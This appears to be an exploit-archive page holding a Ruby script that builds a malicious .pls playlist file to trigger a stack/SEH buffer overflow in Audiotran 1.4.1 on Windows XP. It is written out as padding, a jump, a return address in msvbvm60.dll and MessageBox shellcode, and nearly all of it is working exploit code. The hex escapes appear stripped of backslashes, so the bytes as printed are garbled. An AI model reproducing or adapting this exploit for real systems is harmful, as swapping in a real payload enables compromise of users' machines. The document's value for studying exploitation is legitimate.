Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow
# Published : 2010-01-10
# Author : Sébastien Duquette
# Previous Title : HTMLDOC 1.9.x-r1629 local .html buffer overflow(win32) exploit
# Next Title : Soritong v1.0 Universal BOF-SEH (META)

#!/usr/bin/ruby
#
# Exploit Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow
# Date          : January 9th, 2010
# Author        : Sébastien Duquette
# Software Link : http://www.e-soft.co.uk/Audiotran.htm
# Version       : 1.4.1
# OS            : Windows
# Tested on     : XP SP2/SP3 En (VMware)
# Type of vuln  : Stack Overflow / SEH
# Greetz to     : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
#

banner =
"|------------------------------------------------------------------|n" +
"|                         __               __                      |n" +
"|   _________  ________  / /___ _____     / /____  ____ _____ ___  |n" +
"|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |n" +
"| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |n" +
"| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |n" +
"|                                                                  |n" +
"|                                       http://www.corelan.be:8800 |n" +
"|                                                                  |n" +
"|-------------------------------------------------[ EIP Hunters ]--|nn"

# Corelan Team MsgBox
payload =
"xebx22x56x31xc0x64x8bx40x30x85xc0x78" +
"x0cx8bx40x0cx8bx70x1cxadx8bx40x08xeb" +
"x09x8bx40x34x8dx40x7cx8bx40x3cx5exc3" +
"xebx69x60x8bx6cx24x24x8bx45x3cx8bx54" +
"x05x78x01xeax8bx4ax18x8bx5ax20x01xeb" +
"xe3x34x49x8bx34x8bx01xeex31xffx31xc0" +
"xfcxacx84xc0x74x07xc1xcfx0dx01xc7xeb" +
"xf4x3bx7cx24x28x75xe1x8bx5ax24x01xeb" +
"x66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8b" +
"x01xe8x89x44x24x1cx61xc3xadx50x52xe8" +
"xaaxffxffxffx89x07x44x44x44x44x44x44" +
"x44x44x47x47x47x47x39xcex75xe6xc3x4c" +
"x4cx4cx4cx89xe5xe8x68xffxffxffx89xc2" +
"xebx1cx5ex8dx7dx04x89xf1x80xc1x0cxe8" +
"xc8xffxffxffxebx15x31xd2x59x88x51x36" +
"x51x52xffx54x24x0cxe8xdfxffxffxffx57" +
"x7fx29x62xe8xe6xffxffxffx43x6fx72x65" +
"x6cx61x6ex20x54x65x61x6dx20x53x68x65" +
"x6cx6cx63x6fx64x65x20x2dx20x50x72x6f" +
"x67x72x61x6dx20x65x78x70x6cx6fx69x74" +
"x65x64x20x73x75x63x65x73x73x66x75x6c" +
"x6cx79x58"

print banner
puts "[+] Exploit for Audiotran 1.4.1."

filename = "audiotran_poc.pls"
f = File.new(filename, 'w')
f.write 'A' * 1308 #padding
f.write "xebx06x90x90"
f.write "xcbx75x52x73" # ret at 0x735275CB [msvbvm60.dll]
f.write payload
f.write 'A' * 9000 # padding
f.close

puts "[+] Wrote exploit file : #{filename}."